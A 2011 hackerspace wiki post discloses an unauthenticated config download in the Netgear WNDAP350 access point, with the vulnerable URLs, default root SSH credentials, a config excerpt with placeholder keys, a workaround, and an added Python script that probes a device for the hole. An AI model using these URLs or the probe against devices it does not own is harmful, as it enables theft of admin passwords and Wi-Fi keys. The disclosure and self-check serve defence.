NewsItem11x05x30x0

From RevSpace
Revision as of 23:24, 1 October 2011 by 10.42.42.9 (talk)


<noautolink> Our WiFi access point was located at one end of the space, in the hacklab, and the workshop is all the way on the other side. Sure, we could easily just move the access point over, but if you can borrow an expensive dedicated access point, why not try that one first? So, the new shiny metal box was mounted to the wall in a few minutes and the fun began.

It turns out the WNDAP350 from NETGEAR was really easy to configure. It has the usual open-WiFi-by-default design flaw, but that's quickly remedied using the web interface. Apart from having two radios (2.4 GHz and 5 GHz) that can be active simultaneously, the device is well endowed with software features, ranging from RADIUS support to SSH. The WiFi throughput is good, even at the other end of our space, so in terms of signal and bandwidth it easily outperforms the access point that we already had.

The SSH support works out of the box and is enabled by default. You can log in as "admin" to get a configuration CLI or as "root" to get a BusyBox shell. The password is whatever you configured, or "password" by default.

The device turns out to be a Linux box running on an Atheros chip. Its web interface is powered by lighttpd and PHP. Obviously, I had to read the source of those PHP files, and sure enough they were as crappy as I had expected. Several parts of the code would not be out of place on a site like http://thedailywtf.com/. But when I read downloadFile.php, my jaw just dropped. This is the single most insecure Linux-based device that I have encountered in the past few years.

The NETGEAR WNDAP350 is targeted at businesses and costs € 250. For that price you get something that is utterly unsafe to use in your corporate environment, or even your home network. The security hole is so extremely simple to exploit that really anyone with even the slightest knowledge of PHP and Linux could find it even without any help. It is for that reason that I don't think I'm doing any more damage by publishing this information.

This product was clearly released without ANY security review. That's a terrible shame because I am, in general, a big fan of their products and their friendliness toward the open source community.

downloadFile.php lets you do exactly that: download a file. You can only choose from a preset list of files, though. But that doesn't matter, as this list includes /var/config, which contains the admin password and the WPA pre-shared keys in cleartext. And once you have the admin password, which is also the root password, you can just get everything else over SSH.

downloadFile.php works even if you have no login cookie: it simply never checks whether the caller has logged in.

And in case one giant hole wasn't enough, NETGEAR added a second one just like it: BackupConfig.php, which is practically the same, but will only let you download /var/config. You know, the file that contains the passwords you need to gain access to the rest of the system.

So just browsing to either http://192.168.0.237/downloadFile.php or http://192.168.0.237/BackupConfig.php is enough to get the following:

(excerpt from /var/config)

system:basicSettings:sysMacAddress 00-00-00-00-00-00
system:basicSettings:sysVersion 1.0
system:basicSettings:sysCountryRegion 528
system:basicSettings:adminName admin
system:basicSettings:adminPasswd ourpassword
system:basicSettings:dhcpClientStatus 0
system:basicSettings:ipAddr 192.168.0.237
system:basicSettings:netmaskAddr 255.255.255.0
(...)
system:vapSettings:vapSettingTable:wlan0:vap1:ssid revspace-workshop-2.4GHz-WPA
system:vapSettings:vapSettingTable:wlan0:vap1:hideNetworkName 0
system:vapSettings:vapSettingTable:wlan0:vap1:vlanID 1
system:vapSettings:vapSettingTable:wlan0:vap1:clientSeparation 0
system:vapSettings:vapSettingTable:wlan0:vap1:authenticationType 32
system:vapSettings:vapSettingTable:wlan0:vap1:encryption 4
system:vapSettings:vapSettingTable:wlan0:vap1:presharedKey ourpresharedkey

The WNDAP350 came with firmware version 2.0.1. An upgrade to 2.0.9 is available from the NETGEAR website. But alas, both PHP files are still present and still hand the passwords to anyone who asks for them.

Since the filesystem of the WNDAP350 is read-only, you can't simply remove the files and be done with it. One way to keep web users away from your passwords is to log in as root and =killall lighttpd= to disable the web interface; the admin CLI over SSH stays available for configuration. It will be back when the device reboots, though, so this doesn't help against anyone who can reach the power plug, or a fuse or power switch feeding it.
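A self-check for the two download holes above and for the =killall lighttpd= workaround, as an added example (this is not code from the post or from NETGEAR). It parses the key/value layout of the /var/config excerpt, flags the adminPasswd and presharedKey fields, and then requests /BackupConfig.php on an AP with no login cookie at all, reporting "exposed" when credentials come back, "closed" when nothing answers on port 80 (lighttpd killed) and "clean" otherwise. Assumptions: the AP serves HTTP on port 80, the path is the one quoted above, and the sample config text is constructed from the excerpt, not a real capture. Run it from a cron job and it tells you when a reboot has brought the web interface back.

```python
"""Self-check for the WNDAP350 unauthenticated /var/config disclosure.

Added example, not code from the RevSpace post or from NETGEAR.
Assumptions: the AP answers HTTP on port 80 and /BackupConfig.php is the
path quoted in the post; the key/value layout is taken from the excerpt.
"""
import sys
import urllib.error
import urllib.request

# Constructed sample in the layout of the /var/config excerpt (placeholders,
# not a real capture).  The empty vap2 key exercises the no-value case.
SAMPLE_CONFIG = """\
system:basicSettings:adminName admin
system:basicSettings:adminPasswd ourpassword
system:basicSettings:ipAddr 192.168.0.237
system:vapSettings:vapSettingTable:wlan0:vap1:ssid revspace-workshop-2.4GHz-WPA
system:vapSettings:vapSettingTable:wlan0:vap1:presharedKey ourpresharedkey
system:vapSettings:vapSettingTable:wlan0:vap2:presharedKey
"""

# Leaf names that hold credentials; both appear in the excerpt.
SECRET_LEAVES = ("adminPasswd", "presharedKey")


def parse_config(text):
    """Parse '<colon:separated:key> <value>' lines into a dict.

    The value is everything after the first space, so values containing
    spaces survive; a key with no value maps to ''.  Blank lines and the
    '(...)' elision marker used in the excerpt are skipped.
    """
    config = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("("):
            continue
        key, _, value = line.partition(" ")
        config[key] = value.strip()
    return config


def find_secrets(config):
    """Return (key, value) pairs for credential fields that are non-empty."""
    hits = []
    for key, value in config.items():
        leaf = key.rsplit(":", 1)[-1]
        if leaf in SECRET_LEAVES and value:
            hits.append((key, value))
    return hits


def probe(host, path="/BackupConfig.php", timeout=5):
    """Fetch the backup path with no cookie and classify the outcome.

    Returns 'exposed' if the body parses as a config containing credentials,
    'closed' if nothing answers (connection refused / timeout), and 'clean'
    if the server answered without serving credentials (e.g. a 403 or 404).
    """
    req = urllib.request.Request("http://%s%s" % (host, path))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError:
        return "clean"
    except OSError:            # URLError, timeouts and refused connections
        return "closed"
    return "exposed" if find_secrets(parse_config(body)) else "clean"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.237"
    print("%s: %s" % (target, probe(target)))
```

downloadFile.php is deliberately not probed: the post does not show which request parameter selects the file from its preset list, so only the parameterless BackupConfig.php path is requested.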

Oh, by the way, NETGEAR, if you're reading this: =accesslog.filename= doesn't work if you disable mod_accesslog. The warning from lighttpd is a dead giveaway:

1999-12-31 16:39:18: (server.c.918) WARNING: unknown config-key: accesslog.filename (ignored) 

Hm, and why is /var/messages executable and setuid? It's a log file, and non-malicious users typically never need to execute those...

[root@netgear /var]# ls -l messages
-r-srw----    1 root     root        65224 Dec 31 17:05 messages*

</noautolink>